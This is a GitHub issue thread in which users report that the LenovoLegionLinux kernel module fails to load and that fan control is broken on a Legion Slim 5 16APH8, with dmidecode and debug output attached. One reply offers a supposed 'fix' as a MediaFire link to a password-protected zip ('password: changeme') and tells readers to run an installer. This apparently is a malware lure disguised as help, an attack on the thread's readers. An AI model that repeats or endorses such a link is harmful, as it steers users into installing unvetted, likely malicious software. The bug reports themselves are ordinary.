johnfanv2/LenovoLegionLinux #247: Legion Slim 5 16APH8 (RTX 4070 Mobile) Support

Vicky-Boi, 2024-08-28:
I have seen another issue for the same laptop model, however that issue has the version with an RTX 4060 and my laptop has an RTX 4070.

Moreover, I am getting an error when running `sudo make reloadmodule`, and the error I am getting suggests that I make an issue here.

```
[  371.132532] legion PNP0C09:00: legion_laptop not loaded for this device
[  371.132643] legion PNP0C09:00: probe with driver legion failed with error -5
```

It seems like fan controls are broken as well. `fan curves point size` is always "0". The fan curve section also doesn't show any values at all. In the GUI, all values in the fan curve section shows "0". Clicking any of the buttons in "Fancurve Hardware" always crashes the GUI with `OSError: [Errno 95] Operation not supported`. Nothing in "Fancurve Preset" works as well, but it doesn't crash the GUI.

**Model and Debug Info**

Distribution: Nobara Linux 40
Model name: Lenovo Legion Slim 5 16APH8
CPU model: AMD Ryzen 7 7840HS w/ Radeon 780M Graphics
GPU model: NVIDIA GeForce RTX 4070 Laptop GPU
Keyboard backlight: 4-zone RGB
Light in lid or logo: no
Light at IO-Ports at back: no

Output of `sudo dmidecode -t system`. Please remove Serial Number and UUID for privacy:
```text
# dmidecode 3.6
Getting SMBIOS data from sysfs.
SMBIOS 3.4.0 present.

Handle 0x0001, DMI type 1, 27 bytes
System Information
        Manufacturer: LENOVO
        Product Name: 82Y9
        Version: Legion Slim 5 16APH8
        Serial Number: ----
        UUID: ----
        Wake-up Type: Power Switch
        SKU Number: LENOVO_MT_82Y9_BU_idea_FM_Legion Slim 5 16APH8
        Family: Legion Slim 5 16APH8

Handle 0x001B, DMI type 12, 5 bytes
System Configuration Options
        Option 1: String1 for Type12 Equipment Manufacturer
        Option 2: String2 for Type12 Equipment Manufacturer
        Option 3: String3 for Type12 Equipment Manufacturer
        Option 4: String4 for Type12 Equipment Manufacturer

Handle 0x002A, DMI type 32, 20 bytes
System Boot Information
        Status: No errors detected
```

Output of `sudo dmidecode -t bios`:
```text
# dmidecode 3.6
Getting SMBIOS data from sysfs.
SMBIOS 3.4.0 present.

Handle 0x0000, DMI type 0, 26 bytes
BIOS Information
        Vendor: LENOVO
        Version: M3CN42WW
        Release Date: 01/11/2024
        Address: 0xE0000
        Runtime Size: 128 kB
        ROM Size: 32 MB
        Characteristics:
                PCI is supported
                BIOS is upgradeable
                BIOS shadowing is allowed
                Boot from CD is supported
                Selectable boot is supported
[... 155 lines cut ...]
powermode WMI: 3
has custom powermode: 1
ACPI rapidcharge error: 0
ACPI rapidcharge: 0
WMI backlight 2 state: 0
WMI backlight 3 state: -14
WMI light IO port: 0
WMI light Y logo/lid: 0
EC minifancurve feature enabled: 0
EC minifancurve on cool: error
EC lockfancontroller error: 0
EC lockfancontroller: true
fanfullspeed error: 0
fanfullspeed: 0
fanfullspeed EC error: -1
fanfullspeed EC: 0
EC fan curve current point id: 0
EC fan curve points size: 0
Current fan curve in hardware:
rpm1|rpm2|acceleration|deceleration|cpu_min_temp|cpu_max_temp|gpu_min_temp|gpu_max_temp|ic_min_temp|ic_max_temp
=====================
Current fan curve in hardware (WMI; might be empty)
rpm1|rpm2|acceleration|deceleration|cpu_min_temp|cpu_max_temp|gpu_min_temp|gpu_max_temp|ic_min_temp|ic_max_temp
=====================
```

LC-JiaZhaorong, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

ryanabx, 2024-09-02:
I too get error -5 with my `Legion 16APH8`

DarkRaven255, 2024-09-14:
Exactly the same problem on mine Legion 16APH8 (w/ 4070). Arch + AUR DKMS option to install it.

awsms, 2024-09-16:
Same `legion_laptop not loaded for this device` issue with an RTX4070 / 16APH8 here.

Is it working for the RTX4060 model ? Since this was posted in june 2023 for the 16APH8 : https://github.com/johnfanv2/LenovoLegionLinux/issues/46#issuecomment-1607590567

st0nie, 2026-09-14:
Same as #76: the Slim 5 16APH8 is covered by the M3CN allowlist entry. Please retest with the current release and reopen with dmesg output if it still fails.

closed 2026-09-14 by st0nie